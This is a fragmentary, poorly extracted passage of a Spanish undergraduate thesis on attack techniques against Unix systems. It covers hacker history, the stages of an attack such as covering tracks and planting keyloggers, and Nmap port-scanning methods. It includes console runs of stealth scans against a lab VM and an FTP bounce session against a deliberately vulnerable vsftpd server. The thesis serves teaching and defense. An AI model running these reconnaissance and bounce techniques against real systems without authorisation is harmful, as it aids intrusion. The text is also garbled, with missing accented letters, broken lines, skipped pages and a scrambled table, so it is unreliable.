Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Tesis Marcelo Fernandez
Tesis Marcelo Fernandez
Esta obra est licenciada bajo una Licencia Atribucin-No ComercialCompartir Obras Derivadas Igual 2.5 Argentina de Creative Commons.
Para ver una copia de esta licencia, visite http://creativecommons.org/licenses/bync-sa/2.5/ar/ o envenos una carta a Creative Commons, 171 Second Street, Suite
300, San Francisco, California, 94105, USA.
Marcelo Fernndez
Universidad Nacional de Lujn
Int. Ruta 5 y 7
6700 Lujn, Buenos Aires
Repblica Argentina
marcelo.fidel.fernandez@gmail.com
Resumen
El presente trabajo trata de brindar un panorama acerca de las tcnicas ms
comunes de obtencin de informacin remota en forma activa y pasiva, deteccin
de vulnerabilidades y posteriormente una introduccin al ataque en entornos tipo
Unix, como Linux (Debian, Ubuntu, Red Hat, Fedora, Suse, Mandriva, etc.), BSD
(FreeBSD, OpenBSD, NetBSD), Solaris, AIX, HP-UX, SCO Unix, etc.
En el Primer Captulo se hace una resea de la historia del Movimiento
Hacker, una comunidad nueva e interconectada, surgida al mismo tiempo que y
junto al desarrollo de la informtica misma. Luego se describen los diversos
factores tecnolgicos y circunstancias adicionales que alteraron su recorrido hasta
nuestros das, momento en que se podra decir que est en todo su esplendor.
Seguido de esto, se describe un poco la situacin global de la Seguridad
Informtica hoy en da, su relacin con la tica Hacker y la prctica del Hacking
tico como una forma de vida dentro de la Comunidad Hacker.
En el Tercer Captulo se plantean un conjunto de etapas como tpicas, o que
normalmente se llevan adelante, antes y despus de efectuar un ataque a la
seguridad informtica de una organizacin, con el fin de que tenga mayores
probabilidades de xito primero y maximizar las consecuencias luego.
Los captulos siguientes poseen una neta orientacin tcnica. El Cuarto
presenta la primera y ms extendida forma de recopilacin activa de informacin
remota: el escaneo de puertos o Port Scanning. Se introducen una serie de
variantes o tipos de escaneo, los cuales se encuentran en la herramienta ms
popular, Nmap, detallando el funcionamiento terico y prctico de cada una, ya
que se incluyen capturas del trfico de la red a modo de ejemplo.
El Captulo 5 explica otras formas de reconocimiento remoto, como ser la
deteccin de un Sistema Operativo en base a su pila de protocolos TCP/IP,
llamado OS Fingerprinting, en su versiones activa, pasiva y otras menos
utilizadas. Tambin se desarrollan algunas tcnicas an ms intrusivas, como la
Enumeracin de Servicios y el Fingerprinting de Aplicaciones.
El Sexto Captulo recorre algunas herramientas para aplicar y ampliar an
ms la teora de los dos captulos anteriores: Netcat; opciones avanzadas de Nmap
como su motor de scripting; port scanners alternativos como Unicornscan y
Scanrand, y un packet crafter como Hping es slo una muestra de las
posibilidades que tienen los intrusos (legales o no) frente a los sistemas
informticos.
II
III
Agradecimientos
Agradezco profundamente a toda la gente que me rode durante estos aos
de estudio: familia, docentes, amigos y compaeros con los que recorr el largo y
gratificante camino de estudiante universitario.
IV
ndice de Contenido
Resumen..........................................................................................................Pg. II
Agradecimientos............................................................................................Pg. IV
Prlogo...........................................................................................................Pg. IX
Captulo 1. Introduccin e Historia de los hackers..........................................Pg. 1
1.1. Los Programadores de Verdad..........................................................Pg. 1
1.2. Los dorados '60 - El comienzo de la cultura hacker.............................Pg. 2
1.3. Los aos '70 La Cultura de las PDP-10.............................................Pg. 5
1.4. Aparecen Unix y las minicomputadoras...............................................Pg. 6
1.5. Las microcomputadoras: Computadoras Personales..........................Pg. 11
1.6. Los aos '80, '90 y el FLOSS.............................................................Pg. 11
Captulo 2. El Ataque de sistemas informticos.............................................Pg. 14
2.1. El Negocio de la Seguridad en la Actualidad.....................................Pg. 14
2.2. El Hacking tico................................................................................Pg. 14
Captulo 3. Etapas Tpicas de un Ataque........................................................Pg. 17
3.1. Planificacin y eleccin del objetivo..................................................Pg. 18
3.2. Obtencin de informacin..................................................................Pg. 18
3.2.1. Desde fuera de la organizacin...................................................Pg. 19
3.2.2. Desde dentro de la organizacin.................................................Pg. 20
3.2.3. Ingeniera Social.........................................................................Pg. 21
3.3. Bsqueda y rastreo de vulnerabilidades.............................................Pg. 22
3.3.1. Acceso Local...............................................................................Pg. 22
3.3.2. Acceso Remoto. Enumeracin de Servicios...............................Pg. 23
3.4. Buscando el Anonimato en la red.......................................................Pg. 26
3.4.1. Redes y Sistemas Annimos.......................................................Pg. 26
3.4.2. Utilizacin de Malware...............................................................Pg. 27
3.5. Ataque e Intrusin...............................................................................Pg. 28
3.5.1. Mapeo de Vulnerabilidades........................................................Pg. 28
3.5.2. Explotacin e intrusin...............................................................Pg. 30
3.6. Puertas traseras y Eliminacin de huellas..........................................Pg. 31
3.7. Atacar otro sistema.............................................................................Pg. 31
Captulo 4. Port Scanning..............................................................................Pg. 33
4.1. Mtodo de Funcionamiento y Objetivos............................................Pg. 33
4.2. Estados de un Puerto..........................................................................Pg. 34
V
VIII
Prlogo
Prlogo
Este trabajo surge como consecuencia del grn inters que tengo por la
seguridad informtica por un lado y la admiracin hacia la comunidad hacker por
el otro. Hoy en da, Internet permite que una gran masa de personas, entusiastas de
las nuevas tecnologas, vuelquen informacin e interacten con ella en forma
constante e ininterrumpida, gracias a los programas de software.
Pero lamentablemente, son pocos los que reflexionan que este nuevo medio
de comunicacin es diferente a los dems, para bien y para mal. Los errores de
programacin que antes slo provocaban problemas aqu y all en forma aislada,
cada vez necesitan de mayor cuidado, ya que su diseminacin crece en forma
global y exagerada; cada vez se escribe ms software, para ms consumidores, y
de forma ms integrada con la red.
Los esfuerzos por detener los problemas son cada vez ms difciles de
costear, sobrellevar y afrontar, y en consecuencia, hoy existe todo un gran
mercado global (lcito y del otro) alrededor de las vulnerabilidades en el manejo
de la informacin de esa gran masa.
Es por esto que creo que no es casual el enorme crecimiento del Software
Libre (FLOSS) en estos ltimos aos. Su fundamento en la filosofa hacker, su
defensa de los estndares abiertos, y la defensa de los derechos del usuario en el
manejo de la informacin est expandindose como alternativa, frente a un
modelo que como est quedando demostrado, tiene muchas fallas.
Este trabajo es un breve recorrido de los procedimientos ms comunes para
analizar primero y aprovecharse despus de estos errores, camino que los hackers
han sabido transitar y desarrollar en forma exclusiva, con el objetivo de fomentar
la inacabable cultura del conocimiento.
Aclaracin: Las tcnicas de ataque expuestos en este trabajo son slo una recopilacin a modo de
ejemplo y no pretenden ser completos. La informacin presentada como proveniente de
Organizaciones, Entidades y Empresas pueden o no contener datos verdicos o del mundo real, en
cuyo caso afirmativo ser aclarado oportunamente.
IX
computadoras
para
(ver
Posteriormente,
uso
militar
Ilustracin
la
UNIVAC
1).
I
Jargon File5 [ERJF] , un documento que pretende recopilar el significado del slang,
o lenguaje exclusivamente hacker. El trmino hacker proviene de esta etapa; si
bien originalmente quiere decir alguien quien hace muebles con un hacha, se
encuentra aqu [ERJFH] descripto como:
1. Una persona que disfruta explorar los detalles de los sistemas y exprimir
sus capacidades, al contrario de la mayora de sus usuarios.
2. Alguien que programa de forma entusiasta (hasta obsesiva).
3. Una persona capaz de apreciar el valor del hackeo.
4. Una persona que es buena programando rpidamente.
5. Un experto en un programa en particular, o alguien que frecuentemente
trabaja con l o en l; como por ejemplo, un Hacker Unix.
6. Un experto o entusiasta de cualquier tipo; alguien puede ser un hacker de
la astronoma, por ejemplo.
7. Alguien que disfruta el desafo intelectual de superar o sortear las
limitaciones de forma creativa.
8. El trmino hacker tambin tiende a connotar membresa en la comunidad
global definida por la red (refirindose a ARPANet primero e Internet
ahora).
Como se puede ver, un hacker nada tiene que ver con la visin ms
difundida entre la gente por los medios masivos de comunicacin, la del ladrn
ciberntico, que disfruta ingresando a sistemas sin permiso para robar datos. Si
bien un hacker disfruta de hacer cosas que estn ms bien relacionadas con el uso
no comn de los sistemas, o considera los lmites legales de una forma ms difusa
o relajada (slo porque es bueno saber todos los detalles de un sistema y sortear
sus mecanismos de seguridad para luego mejorarlos), la intencin del hacker no
es robar informacin o causar dao alguno. Para aquellos que s lo hacen, los
hackers inventaron otro trmino: cracker.
Para finalizar, dada la definicin de hacker, Raymond escribe: Hay una
comunidad, una cultura compartida de programadores expertos y magos de las
redes informticas que recorren la historia hacia atrs varias dcadas, hasta la
primer computadora de tiempo compartido y los primeros experimentos de la
ARPANet. Los miembros de esta cultura dieron origen al trmino 'hacker'. Los
hackers construyeron la Internet. Los hackers hicieron el sistema operativo Unix
5 The Jargon File: El Archivo de la Jerga. Tambin denominado El Diccionario Hacker.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 3 de 229
lo que es hoy. Los hackers ejecutaron la Usenet. Los hackers hicieron la World
Wide Web funcionar. Si usted es parte de esta cultura, si usted contribuy a ella y
otras personas en ella saben quin es usted y lo llaman un hacker, entonces, usted
es un hacker. [ERBH]
Volviendo a esta poca dorada de los hackers [EBHL], hay que remarcar que
slo fue movilizada (y hasta posible) por notables cambios en la tecnologa de
la computacin. Como se dijo anteriormente, hasta ese momento las
computadoras eran utilizadas para ejecutar interminables procesos por lotes,
donde programarlas era bastante tedioso, ya que una mnima equivocacin en el
programa escrito (en un lenguaje de muy bajo nivel) haca que todo el
procedimiento fallara. Cuando apareci la TX-0 (la primera mquina
transistorizada, una de las primeras con una salida en forma de imagen [CM_TX0])
y las primeras computadoras PDP de DEC, todo cambi, ya que estas
computadoras proponan una operacin ms interactiva, que podan tocar
(tena una mquina de escribir elctrica adaptada para entrar datos a la mquina).
As y todo, la exigua cantidad de memoria y capacidad de procesamiento
con que contaban estas mquinas, haca que los programadores aplicaran todo su
ingenio para lograr mejores programas con muy pocos recursos disponibles. Es as
como nacieron los primeros hacks (no olvidemos que se buscaba recortar o
hachar el consumo de memoria y/o procesamiento) en los programas y luego,
el trmino hacker fue imponindose por decantacin.
Como estas primeras mquinas de cmputo, el movimiento e inters por
ellas se expandi y no slo tuvo su esplendor en el AILab del MIT, sino tambin
en la Universidad de Standford (SAIL6) y en la Carnegie-Mellon7, donde se
formaron ms centros de cultura hacker e investigacin.
Aos ms tarde, con la creacin de la red de comunicaciones ARPANet
(1969), estos centros de investigacin, originalmente divididos, comenzaron a
unificarse, a tener conciencia propia y funcionar como una comunidad, como
una tribu. Esto los fortaleci an ms y profundiz su alcance, logrando
avances tecnolgicos permanentemente.
El intercambio de informacin, el trabajo en conjunto entre laboratorios y
universidades hizo que todo el movimiento en s se potenciara en las siguientes
6 SAIL: Standford Artificial Intelligence Laboratory.
7 CMU: Carnegie-Mellon University.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 4 de 229
Es por esto que las PDP y sus hackers coparon la ARPANet; siendo la
cultura de la PDP-10 [PDP10-PRM][PDP10-Web] la ms relevante de esa poca (y en
menor medida las PDP-7 y PDP-8).
Es entonces donde los distintos (pero interconectados) ncleos de actividad
hacker y sus PDP-10 comenzaron a interesarse por diferentes lneas de
8 DEC: Digital Equipment Corporation
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 5 de 229
El AILab del MIT desarroll un sistema operativo alternativo para el PDP10 denominado ITS (Incompatible Timesharing System [WIKI_ITS]), a
diferencia del que integraba DEC (el TOPS-10 [WIKI_TOPS10]), y tena un
objetivo claro: desarrollar y utilizar dentro del laboratorio un sistema de
tiempo compartido propio, maximizando la eficiencia del hardware y los
usuarios[ITS_MIT]. Adems de hacer las cosas a su forma, este sistema
operativo permiti que los hackers del MIT desarrollaran una serie de
avances sin precedentes: el editor Emacs, el lenguaje LISP, y muchas
innovaciones revolucionarias en el ITS mismo, ms avanzado respecto de
otros Sistemas Operativos de aquel entonces, como Sistemas de archivos
remotos, manejo de procesos sofisticado, soporte de tiempo real , etc.
Todo este conocimiento terico y trabajo de aos fue llevado a
muchsimos sistemas, y permanece en uso hasta hoy en da; sin embargo,
el ITS en s estaba escrito en lenguaje de mquina (assembler) para la
PDP-10, y estaba atado a su destino.
Tambin fueron importantes los avances logrados por los hackers del
PARC9[XPARCWEB]:
La impresora lser.
A esta altura (segunda mitad de la dcada del '70), la ARPANet era mucho
ms extensa que al comienzo, una universidades, centros de investigacin y
entidades estatales de EEUU; en trminos de hardware, era un conjunto de ms de
100 computadoras (111 en marzo de 1977, ver Ilustracin 4) [ARPA_TFI], la
mayora PDP-10 y PDP-11. Tena varias aplicaciones y protocolos estndar, como
Ilustracin 5: Arbol de las diferentes versiones de Unix a lo largo del tiempo [WIKI_LIN]. Ver
tambin otro rbol grfico an ms completo en [WIKI_UX]
Un buen ejemplo de esto se dio a fines de los '70, cuando DEC lanz la
arquitectura VAX, que se diseo como extensin y evolucin a 32 bits de la
anterior PDP-11. Thomas B. London y John F. Reiser escribieron un documento al
respecto[Unix32v] de donde la siguiente frase resume el trabajo de llevar Unix a la
VAX, llamado Unix/32V: Work on the C compiler began in mid-December 1977.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 9 de 229
primera empresa conocida y abocada a producir sistemas de este tipo, con Steve
Wozniak y Steve Jobs a la cabeza.
Bill Gates y Paul Allen, si bien no fueron miembros de este club, fueron
parte de esta corriente y desarrollaron su primer y exitoso producto: el lenguaje
Altair Basic, que se volvi el lenguaje estndar para la programacin de las
microcomputadoras.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 11 de 229
15 Cabe resaltar que Stallman perteneca a la generacin de hackers del ITS y de las PDP-10.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 13 de 229
en 1984:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 14 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 15 de 229
You can create art and beauty on a computer: Usted puede crear arte y
belleza en una computadora.El programa ms corto debera ser admirado
por compaeros hackers[...] Hay definitivamente un impulso artstico
dentro de aquellos que pueden utilizar esta tcnica de genio-marciano, de
una calidad visionaria que los habilita a descartar el punto de vista actual y
establecer, de una forma totalmente inesperada, un nuevo algoritmo.
Computers can change your life for the better: Las computadoras pueden
cambiar su vida para mejor.
sus
rdenes.
Seguramente
cualquiera
podra
beneficiarse
al
18 Eric Cole utiliza ataque pasivo y reconocimiento pasivo de forma indistinta y como
sinnimos. De hecho, le da la categora de ataque a algo que es meramente una bsqueda de
informacin, justificndolo tal como se transcribe.
19 Los ataques activos se utilizan para referenciar la seccin 1.3.3.
20 avenidas en dicha frase es una metfora de sistema/red propia de la organizacin.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 19 de 229
Llamadas telefnicas.
Mensajes de texto.
Visitas personales
formulario, o que le enve un fax con ciertos datos, etc. Las posibilidades y
situaciones son casi infinitas, y los estudios al respecto son alarmantes para toda
entidad preocupada por su seguridad [ISOC_STAT], donde se refleja lo sencillo que
es conseguir informacin ms o menos sensible de la mayora de los usuarios.
Para ejemplificar, un posible intruso, para conseguir acceso a la estacin de
trabajo de un empleado de una empresa, podra enviarle por correo tradicional a
su escritorio un pen drive, CD, etc. de regalo, de alguna empresa cliente, para que
lo vea. Luego, el empleado inserta el CD dentro de la computadora de su trabajo y
ejecuta la presentacin, que adems de mostrarle la salutacin para pasar
desapercibido, instala tambin un programa oculto que enva informacin del
equipo al atacante va internet, tomando el control de su equipo, y sirviendo de
puerta de entrada a toda (o parte al menos de) la red de la empresa.
cualquier otra precaucin puede ser vencida por un decidido atacante con posesin
fsica de una computadora. Configurar permisos de archivos, establecer
contraseas de acceso, y ocultando el ltimo nombre de usuario y contrasea
utilizados para iniciar la sesin son todos intentos loables, pero no van a frustrar a
un atacante experimentado.
As y todo, hay muchas historias y tcnicas sobre bsqueda activa de
debilidades de este tipo que se distribuyen por la red, como por ejemplo:
Dumpster
diving
[WIKI_DUMP] :
Consiste en
revolver la
basura
Aplicaciones:
Issue
Tracking,
Si la meta del atacante en esta etapa es tener una radiografa del sistema
objetivo, el medio para generarla es realizar una deteccin de los puertos
abiertos24 en primera instancia, y luego determinar la versin especfica (o al
menos aproximada) del software que est detrs, en lo que se conoce como
enumeracin.
Como puede deducirse al ver el listado, as como la cantidad de
posibilidades es realmente enorme, existe una cantidad igual de grande de
programas desarrollados en pos de obtener informacin remota; con el
tiempo, un cracker experimentado puede hacerse de un toolkit25 importante y
diverso de software para obtener informacin y verificar debilidades en los
sistemas.
An as, se puede considerar a Nmap como el ms utilizado ya que es el
24 Un puerto (en el protocolo TCP) es un nmero que representa una conexin con la capa de red
IP del Sistema Operativo. Puede tener varios estados, y el estado abierto significa que hay un
programa asociado al mismo que est escuchando por peticiones de otros programas en la red,
usualmente para devolverle algn resultado
25 Toolkit: Conjunto o Caja de herramientas.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 24 de 229
quizs ya sea posible crear una lista de vulnerabilidades potenciales por las cuales
el atacante podr vencer a las lneas de defensa del objetivo. Dicha lista es el
producto del anlisis conocido como mapeo de vulnerabilidades33. Lo ideal es
priorizar dicha lista, identificando la dificultad inherente de cada agujero
detectado o que se sospecha que existe. Tambin, si se investig una red o varios
hosts, se puede priorizar por equipo: por ejemplo, los sistemas que se encuentran
en etapa de pruebas (test.empresa.com), o con muchos servicios abiertos, sern
ms vulnerables y generalmente menos vigilados que los que estn en produccin,
por lo que son preferibles para comenzar el ataque. Adems es aplicable una
verificacin de no estar atacando algn honeypot 34. Es decir, aplicar el sentido
comn en el ordenamiento de los objetivos es primordial en esta parte del proceso.
Una buena definicin ([HACK_EXP], cap. 5) de quizs, la etapa ms
importante antes de atacar el objetivo es: El mapeo de vulnerabilidades es el
proceso de relacionar atributos especficos de seguridad de un sistema a una
vulnerabilidad asociada o potencial. Esta es una fase crtica en la explotacin de
un sistema objetivo que no debera ser pasada por alto.
Como ayuda, el atacante puede recurrir a bases de datos pblicas de
33 La palabra mapeo es una castellanizacin del ingls map, que significa trazar en un mapa.
Se utiliza mucho para hacer referencia a la traza de puntos, ideas, relacionar una cosa con otra.
34 Ver Glosario: Honeypot, pg. 62.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 29 de 229
algunos casos.
Otra alternativa, si es que ya se obtuvo todo lo que se deseaba, sera
eliminar todo rastro del ataque: limpiar historiales de comandos, archivos
temporales, restablecimiento de algn servicio afectado, permisos de archivos, etc.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 31 de 229
protocolos planos sin TLS40/SSL41, etc.); las redes conmutadas (unidas por
switches) no son un problema si se utilizan tcnicas de ARP 42 Spoofing43 o
similares.
Instalar software que se aproveche del uso del equipo, como por ejemplo
un keylogger por software.
Evidentemente, el grado de xito de la permanencia en el objetivo estar
dado por la relevancia del sistema comprometido y las medidas que se estn
implementando en la organizacin para aislarse de los ataques en cuanto a
mtodos de control, confidencialidad y autenticacin de seguridad a los distintos
equipos y dispositivos de red.
Ser rpido. Un escaneo puede tomar horas y hasta das en una red WAN.
Ser preciso. Para evitar los falsos positivos y detectar puertos realmente
abiertos.
Pasar lo ms desapercibido (stealth) posible para evitar la deteccin de
55 Hay que destacar que lo que se muestra aqu como captura de trfico es una interpretacin de la
misma hecha con algunas herramientas de las cuales se dispone, ocultando detalles para reducir
la complejidad y extensin innecesaria del documento. Es por eso que aqu no se aprecia el
byte 0x03 dentro del encabezado ICMP que indica esto. Ver el Anexo B.
56 Ver Glosario: DNS, pg. 61.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 38 de 229
resultado del objetivo un tiempo aproximado de 400 ms. Sabiendo el RTT, est
claro que el nivel de confianza en el resultado (el puerto est siendo
filtrado) es muy alto. El tiempo total del test dur unos 0.5 segundos (500
milisegundos).
Si bien este ejemplo es sencillo porque se posee un valor de RTT bastante
confiable resultado de una peticin ARP, en el caso de los escaneos a objetivos
fuera de una LAN el problema de saber cunto esperar se complica, ya que hay
seguramente varios nodos intermedios, trfico de terceros, y la posibilidad de
establecer un RTT nico y constante es casi imposible. Diferentes port scanners 61
toman diferentes criterios para tratar de solucionarlo, y todo buen hacker debe
conocer estos detalles, ya que un falso positivo o un negativo errneo puede
dificultar la tarea de obtencin de grietas en la seguridad de la red a penetrar.
Por ltimo, hay que resaltar que dependiendo de las herramientas que se
utilicen, en un escaneo de puertos UDP slo se puede aseverar que un puerto
UDP est cerrado; es decir, si no est cerrado, puede estar abierto o filtrado.
En el caso de que no se reciba un paquete ICMP Destination Unreachable, para
determinar que un puerto UDP est abierto, hay que saber de antemano qu
servicio est escuchando en dicho puerto y hablar su protocolo. Es cierto que
hay un juego de probabilidades (por ejemplo, en el puerto 53 es realmente raro
que haya algo diferente a un servidor DNS) en donde se defina un conjunto de
puertos UDP comunes para hacer pruebas, pero an as, esta capacidad de
implementar protocolos de capas superiores a la 4 escapa usualmente a los port
scanners dada su complejidad. Aqu reside otra razn por la cual los escaneos TCP
son generalmente ms tenidos en cuenta.
69 Sudo es un programa que permite dar acceso a un usuario o un grupo Unix permisos para
ejecutar un comando como usuario root. URL: http://www.sudo.ws/
70 El Connect Scan es el que Nmap ejecuta por defecto para los usuarios no root. An como
usuario root, el parmetro -sT permite forzar este tipo de scanning.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 43 de 229
Paquete Nro: 1
Tiempo: 0.000000
Origen: 00:17:31:96:5b:1f: -> Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.30? Tell 192.168.0.2
Paquete Nro: 2
Tiempo: 0.000269
Origen: 00:0c:29:e1:a2:26: -> Destino: 00:17:31:96:5b:1f:
Protocolo: ARP
Descripcin: 192.168.0.30 is at 00:0c:29:e1:a2:26
Paquete Nro: 3
Tiempo: 0.031898
Origen: 192.168.0.2:34490 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 34490 > 22 [ACK] Seq=0 Ack=0 Win=1024 Len=0
Paquete Nro: 4
Tiempo: 0.032162
Origen: 192.168.0.30:22 -> Destino: 192.168.0.2:34490
Protocolo: TCP
Descripcin: 22 > 34490 [RST] Seq=0 Len=0
Paquete Nro: 5
Tiempo: 0.032321
Origen: 192.168.0.2:34490 -> Destino: 192.168.0.30:80
Protocolo: TCP
Descripcin: 34490 > 80 [ACK] Seq=0 Ack=0 Win=2048 Len=0
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 45 de 229
Paquete Nro: 6
Tiempo: 0.032396
Origen: 192.168.0.30:80 -> Destino: 192.168.0.2:34490
Protocolo: TCP
Descripcin: 80 > 34490 [RST] Seq=0 Len=0
sucede con la mayora de los servicios que utilizan UDP, ya que Nmap enva un
probe UDP pero vaco75,76.
Adems estos resultados, en ocasiones puede recibirse un ICMP tipo 3
(Destination Unreachable), pero cdigo 1, 2, 9, 10 o 13, en cuyos casos, Nmap
informa que el puerto est filtrado (solamente). Esto es as porque justamente
estos paquetes ICMP reportan un problema con el destino o una prohibicin a
nivel administrativo.
Por ltimo, si algn servicio que est escuchando en el puerto UDP que est
siendo escaneado, retorna alguna respuesta al estmulo del datagrama vaco
enviado por Nmap, ste lo marca como abierto.
Estos dos ltimos casos no son tan comunes, ya que en las redes de hoy en
da estos paquetes ICMP no son utilizados por routers/firewalls (los datagramas
simplemente se dropean), o por otra parte no hay muchos servicios que
respondan a un mensaje vaco, respectivamente.
brevedad slo se muestra aqu una nica captura (la Nro. 8); el resto (Nros. 9 a 11)
estn disponibles en el Anexo B).
En las capturas de trfico puede verse que justamente, salvo para el puerto
abierto 22 (donde no hay respuesta alguna), la respuesta del host 192.168.0.30 es
un RST+ACK.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sN 192.168.0.30 -p
22,25,80
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:42 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
22/tcp open|filtered ssh
25/tcp closed
smtp
80/tcp closed
http
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.541 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sM 192.168.0.30 -p
22,25,80
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:43 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE SERVICE
22/tcp closed ssh
25/tcp closed smtp
80/tcp closed http
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.393 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sX 192.168.0.30 -p 20-22
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:44 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
20/tcp closed
ftp-data
21/tcp closed
ftp
22/tcp open|filtered ssh
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.677 seconds
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap -sF 192.168.0.30 -p
22,110,8080
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-04 12:45 ARST
Interesting ports on ciclon (192.168.0.30):
PORT
STATE
SERVICE
22/tcp
open|filtered ssh
110/tcp closed
pop3
8080/tcp closed
http-proxy
MAC Address: 00:0C:29:E1:A2:26 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.543 seconds
marcelo@saturno:~/src/nmap/bin$
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 50 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 51 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 54 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 55 de 229
Captura 10: Ejecucin del Idle Scan en s, dado que el puerto 25 est abierto
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 56 de 229
puertos, pero de todas maneras lo mejora (se comporta en forma parecida a una
bsqueda binaria recursiva). Una de las ventajas es que ni C ni su administrador
se enteran en ningn momento que el escaneo provino en realidad de A. Otra es
que A puede detectar relaciones de confianza entre B y C; es decir, si C tiene
reglas diferentes para B que lo hacen especial (por ejemplo, le permite pasar cierto
trfico), A puede detectarlo.
Entre las mayores desventajas, est la de encontrar un Zombie adecuado.
Claramente, ms all de que B debe utilizar un Sistema Operativo que asigne IPIDs predecibles para todo el trfico, B debe poseer algn puerto sin filtrar para
que A pueda obtener RSTs. Tambin puede complicar el trfico que tenga B en ese
momento, como tambin la cantidad de paquetes que es necesario intercambiar,
con el consiguiente consumo de ancho de banda y prdida de tiempo hasta obtener
un resultado.
Para ms detalles de este escaneo, ver [SNC_IDLE] y [NMAP_IDLE].
88 En el protocolo FTP, al igual que en el protocolo HTTP, a un comando del cliente le sigue una
respuesta del servidor; dichas respuestas estn definidas en los RFC y estn precedidas por un
cdigo de mensaje (un nmero), adems del mensaje en formato texto (ya que en los inicios de
internet un cliente poda ser un usuario humano). Los cdigos mayores a 200 son de OK, los
mayores a 400 son de Error y as sucesivamente. Ver [WIKI_FTPC].
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 59 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 60 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 61 de 229
Captura 13: Captura de trfico del momento donde el FTP Server B chequea (en nombre de A) el
estado de los puertos 22 -cerrado- primero y 80 luego -abierto- en C.
utilizar vsftpd como Bounce Server, el ataque falla. Vsftpd parece nunca retornar
un cdigo diferente de 200 (OK) a pesar de que su conexin al objetivo fue
rechazada con un RST.
220 (vsFTPd 2.0.4)
USER anonymous
331 Please specify the password.
PASS -wwwuser@
230 Login successful.
PORT 192,168,0,100,0,80
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,0,100,4,32
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
500 OOPS:
Captura 14: Sesin de ataque de un servidor VSFTPD configurado para ser vulnerable
Consola 8: FTP Bounce Scan a un servidor VSFTPD y un Syn Scan como prueba del error
Tipo/Caract.
Syn Scan
Media
Medio
Alta
Objetivo
Puertos Abiertos ,
Cerrados y Filtrados
Connect Scan
No
Baja
Muy
Alta
Bajo
Puertos Abiertos ,
Cerrados y Filtrados
Ack Scan
Si
Media
Alto
Media
Puertos Filtrados
Window Scan
Si
Media
Alto
Baja
Puertos Filtrados +
Abiertos/Cerrados
UDP Scan
Si
Alta
Medio/
Media
Bajo
M/Null/Fin/Xmas
Si
Media
Alto
Media
Idle Scan
Si
Muy
Muy Alto
Alta
Puertos Abiertos,
Baja
FTP Bounce
No
Muy
Cerrados y Filtrados
Muy Alto Media/Baja
Baja
IP Scan
Si
Baja
Puertos Abiertos,
Cerrados/Filtrados
Bajo
Media
Detectar protocolos
activos de Capa 4
Consola 11: Firma de OpenBSD 4.2 almacenada en el formato de NMap 2da generacin
cada uno enva una serie predefinida de paquetes. La respuesta que se obtiene de
cada test permite hacer varias y diferentes evaluaciones y/u obtencin de
parmetros; estas evaluaciones o parmetros se agrupan por lo que se llaman
probes dentro de un Test. Todos estos probes compuestos por sus parmetros
calculados conforman la huella dactilar de un SO y son los que efectivamente se
vuelcan en un archivo de fingerprint.
Nmap, como la mayora de este tipo de herramientas, fomentan la
participacin de los usuarios imprimiendo por pantalla un fingerprint que no
exista en la base de firmas, con la intencin de que el mismo sea reportado al
proyecto junto con la identificacin de a qu SO pertenece.
96 Para ms informacin sobre la primera generacin del motor, que an sigue siendo til, ver
[NMAP_OS1] y [HACK_EXP], Cap. 2.
97 Ver http://insecure.org/stf/Nmap-4.50-Release.html
98 Para mayor informacin de los cambios entre las diferentes versiones de Nmap, ver el siguiente
enlace: http://nmap.org/changelog.html
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 68 de 229
Parmetros Obtenidos:
a) Obtencin de Mximo Comn Denominador en los Nmeros de
